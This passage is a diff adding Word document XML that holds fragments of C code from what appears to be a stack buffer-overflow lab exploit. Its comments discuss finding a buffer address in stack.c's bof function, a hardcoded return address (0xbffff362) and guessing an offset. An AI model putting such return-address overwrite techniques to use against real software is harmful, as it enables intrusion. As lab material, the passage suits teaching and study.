+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>buffaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: %11x\n", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>get_buffaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(buffer)); */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>This</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> address refers to an address inside of  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>stack.c's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>bof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function. The address was determined as a </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>result</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of initializing x to 0 in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>stack.'s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>bif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function and </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>printing</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> its address with a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> statement */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>retaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 0xbffff362; */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Alternative, correct approach that required us taking an educated </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>guess</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> at what the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>offest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> should be in order to land in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>stack.c's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>bof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
